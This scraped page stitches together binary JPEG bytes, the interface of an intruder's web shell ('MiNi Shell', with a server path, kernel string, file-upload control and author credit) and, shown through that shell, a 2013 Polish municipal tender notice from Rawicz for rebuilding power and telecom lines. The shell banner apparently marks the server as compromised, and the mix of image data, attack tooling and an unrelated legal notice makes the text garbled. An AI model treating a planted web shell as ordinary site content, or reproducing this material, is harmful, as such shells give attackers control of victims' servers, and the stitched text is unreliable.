JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/217342-N-2013.html

<p class="kh_header"><b>Rawicz: Przebudowa sieci elektroenergetycznej oraz urządzeń telekomunikacyjnych od ul. Kamińskiego do ronda ul. Armii Krajowej i ul. Ceglanej w Rawiczu</b><br>
<b>Numer ogłoszenia: 217342 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa sieci elektroenergetycznej oraz urządzeń telekomunikacyjnych od ul. Kamińskiego do ronda ul. Armii Krajowej i ul. Ceglanej w Rawiczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na przebudowie sieci elektroenergetycznej oraz urządzeń telekomunikacyjnych od ul. Kamińskiego do ronda ul. Armii Krajowej i ul. Ceglanej w Rawiczu w ramach zadania określonego w uchwale budżetowej: Przebudowa ul. 1000 Lecia i ulicy Ceglanej wraz z ich przyłączeniem z ul. Armii Krajowej.

2.	Zakres zadania obejmuje roboty budowlane w poszczególnych branżach:
1)	przebudowę sieci elektroenergetycznej tj. linii napowietrznej i kablowej w szczególności: budowę nowych odcinków linii kablowych nn i SN, montaż słupów, konieczne demontaże, badania i pomiary.
2)	przebudowę urządzeń telekomunikacyjnych, w szczególności: zabezpieczenie istniejących kabli rurami osłonowymi, 
budowę kanalizacji kablowej 2- otworowej wraz ze studnią SKR 1, budowę nowych odcinków kabli układanych w projektowanej kanalizacji, konieczne demontaże, badania i pomiary 

3.	Szczegółowy zakres zamówienia stanowiący opis przedmiotu zamówienia określony został za pomocą:
1)	przedmiaru robót wraz z kosztorysem zerowym opracowanym w oparciu o dokumentacje projektowej 
2)	projektu budowlanego zagospodarowania terenu,
3)	projektu budowlanego przebudowy sieci elektroenergetycznej,
4)	projektu budowlanego przebudowy urządzeń telekomunikacyjnych,
5)	szczegółowej specyfikacji technicznej wykonania i odbioru robót dla poszczególnych branż

stanowiących integralną część niniejszej Specyfikacji Istotnych Warunków Zamówienia.
Wymienione dokumentacje są zamieszczone na stronie internetowej Zamawiającego www.rawicz.pl (zakładka: zamówienia publiczne). Materiały te można również pobrać za opłatą w siedzibie Zamawiającego pok. 111.

4.	Mogące występować w dokumentacjach projektowych i dokumentacji kosztorysowej nazwy własne producentów lub wyrobów zostały użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań.

5.	Roboty budowlane będące przedmiotem niniejszego zamówienia wykonywane będą na podstawie opracowanego projektu pn: Budowa drogi od ul. Kamińskiego do ronda ul. Armii Krajowej i ul. Ceglanej wraz z kanalizacją deszczową, kanalizacją sanitarną, siecią wodociągową i oświetleniem ulicznym w Rawiczu. W związku z powyższym Zamawiający zamieszcza na stornie internetowej dokumentacje projektowe wraz z załącznikami dotyczące tylko realizowanego zadania. Obowiązujący zakres zawiera przedmiar wraz z kosztorysem zerowym.
Pełna dokumentacja projektowa możliwa jest do wglądu w siedzibie Zamawiającego. 

6.	Wykonawca przy realizacji robót budowlanych w ramach zaproponowanej ceny ofertowej zobowiązany będzie również do: 

1)	stosowania wyrobów budowlanych wprowadzonych do obrotu na zasadach określonych w ustawie z dnia 16.04. 2004 roku o wyrobach budowlanych (Dz. U. Nr 92 poz. 881 z późniejszymi zm.);
2)	prowadzenia robót budowlanych zgodnie z udzieloną decyzją o zezwoleniu na realizację inwestycji drogowej,
3)	podczas prac ziemnych przestrzegać uwag zawartych w opinii Wojewódzkiego Urzędu Ochrony Zabytków w Poznaniu delegatura w Lesznie, nadzór archeologiczny zapewni Zamawiający,
4)	opracowania i zatwierdzenia projektów zmiany organizacji ruchu na odcinku wykonywanych prac oraz odpowiedniego oznakowania na czas prowadzenia robót (jeżeli będzie taka potrzeba); podczas wykonywania prac miejsce powinno być oznakowane zgodnie z § 5 ust. 2 Rozporządzenia Ministra infrastruktury z dnia 23.09.2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem (Dz. U. Nr 117, poz. 1729);	
5)	obsługi geodezyjnej podczas realizacji całej inwestycji oraz sporządzenia inwentaryzacji geodezyjnej powykonawczej osobno dla poszczególnych branż - po 3 egz. (do zdania Zamawiającemu) i zgłoszenia jej w ośrodku geodezyjnym.
6)	zorganizowania i przeprowadzenia niezbędnym prób, pomiarów, badań jak również odbiorów oraz wykonania dokumentacji powykonawczej,
7)	ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej, ponoszenia kosztów szkód wynikłych w czasie wykonywania robót jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny;
8)	organizacji i zabezpieczenia placu budowy oraz zaplecza budowy, ustanowienie kierowników robót branży elektrycznej i telekomunikacyjnej posiadających odpowiednie uprawnienia do pełnienia tych funkcji oraz w razie potrzeby wykonanie planu bezpieczeństwa i ochrony zdrowia, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23.06. 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U.  Nr 120 poz. 1126),
9)	utrzymania palcu budowy (naprawy, woda, energia elektryczna, telefon, dozorowanie budowy itp.),   
10)	po zakończeniu robót demontażu obiektów tymczasowych oraz uporządkowania terenu zajętego na prowadzenie robót związanych z realizacją robót,
11)	udzielenia 36 miesięcznej rękojmi i gwarancji na wykonane roboty oraz wbudowane materiały i urządzenia.

7.	Wykonawca jest zobowiązany prowadzić roboty budowlane zgodnie z wydanymi warunkami, opiniami, decyzją, zatwierdzonymi projektami oraz obowiązującymi przepisami w sposób nie zagrażający bezpieczeństwu ludzi i mienia.

8.	Wszelkie formalności i opłaty związane ze zgłoszeniem oraz odbiorem poszczególnych robót w jednostkach, które wydały uzgodnienia/ warunki - leżą po stronie wybranego Wykonawcy.    

9.	Roboty winny być prowadzone przez Wykonawcę zgodnie z obowiązującymi  przepisami Prawa Budowlanego przez pracowników o odpowiednich kwalifikacjach i uprawnieniach, pod nadzorem osób dozoru Wykonawcy, posiadających uprawnienia budowlane do kierowania robotami budowlanymi. 

10.	Wykonawca zobowiązany jest w razie konieczności przeprowadzić badania archeologiczne, ze względu na lokalizację niniejszej inwestycji w rejonie stanowiska archeologicznego, objętego ochroną konserwatorką. 
W związku z powyższym, należy przestrzegać uwag zawartych w opinii Wojewódzkiego urzędu Ochrony zabytków w Poznaniu Delegatura w Lesznie z dnia 04.04.2013 roku Nr Le.5183.934.2.2012.
Koszt nadzoru archeologicznego ponosi Zamawiający. 

11.	Przy wykonawstwie oraz odbiorze robót objętych niniejszym zamówieniem obowiązywać będą zasady i wymagania dotyczące zasad prowadzenia robót jak również ogólne wymagania dotyczące wykonania i odbioru robót budowlanych określone w:
1)	Szczegółowej Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych dla poszczególnych branż,
2)	Specyfikacji Istotnych Warunków Zamówienia Nr IT.2710.12.2013 wraz z załącznikami,
3)	kosztorysie ofertowym,
4)	projektach budowlanych 
5)	Polskich Normach 

12.	Wymienione w dokumentacjach projektowych i specyfikacjach technicznych wykonania i odbioru robót budowlanych wyroby budowlane powinny spełniać wymagania wynikające z Polskich Norm przenoszących normy europejskie PN-EN (normy zharmonizowane). Jeżeli jakakolwiek Polska Norma przenosząca normy europejskie nie została wymieniona w tych dokumentach, a ma zastosowanie dla wyrobu przewidzianego do wbudowania, obowiązkiem Wykonawcy jest zastosowanie tej normy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY  przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt  6  ustawy, stanowiących nie więcej niż   50%  wartości zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówień, w okresie 3 lat od udzielenia zamówienia  podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.23.23.32-8, 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w powyższym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w powyższym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w powyższym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w powyższym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w powyższym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (w oryginale) (załącznik nr 1 do SIWZ).
2)	kosztorys ofertowy w wersji papierowej opracowany przez Wykonawcę metodą kalkulacji szczegółowej w oparciu o załączony przedmiar wraz z kosztorysem zerowym stanowiący załącznik nr 6 do SIWZ, z uwzględnieniem zapisów zawartych w rozdziale XVI. Zamawiający zastrzega sobie możliwość żądania od wybranego Wykonawcy do złożenia kosztorysu ofertowego w wersji elektronicznej. 
3)	Oryginał pełnomocnictwa do reprezentowania (o ile ofertę składa pełnomocnik) lub kopia pełnomocnictwa poświadczona przez notariusza. 
4)	dokumenty potwierdzające równoważność materiału lub sprzętu (o ile Wykonawca stosuje w ofercie materiał i sprzęt równoważny).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :
1)	potrzeby wykonania robót zamiennych lub odstąpienia od realizacji części robót, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
2)	wystąpienia robót dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
3)	na uzasadniony wniosek Wykonawcę zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona,      
4)	braku rozwiązań  projektowych lub błędów w dokumentacji projektowej stwierdzonych w czasie trwania robót o czas niezbędny do ich uzupełnienia,
5)	zmiany  technologii wykonania robót,  
6)	zmiany urzędowej wysokości stawki podatku VAT, 
7)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,
8)	  wprowadzenie lub zmiana zgłoszonych w ofercie części robót wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego, 
9)	zmiany  terminu realizacji zamówienia, 
10)	przekształcenie którejkolwiek ze stron umowy,
11)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
12)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
13)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Miejski Gminy Rawicz ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego - w sekretariacie Urzędu Miejskiego Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamówienie nie jest finansowane ze środków Unii Europejskiej.
2.	Wszelkie oświadczenia, wnioski, zawiadomienia oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia Zamawiający i Wykonawcy przekazują pisemnie. 
3.	Zamawiający  dopuszcza możliwość  porozumiewania się  obu stron (Wykonawca, Zamawiający) za pomocą:  faksu (65) 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl. 
4.	Jeżeli Zamawiający lub Wykonawca przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 
5.	Zamawiający nie przewiduje określenia w opisie przedmiotu zamówienia wymagań, o których mowa w art. 29 ust. 4 ustawy PZP.
6.	Zamawiający nie przewiduje zawarcia umowy ramowej, przeprowadzenia aukcji elektronicznej oraz nie zamierza ustanowić dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com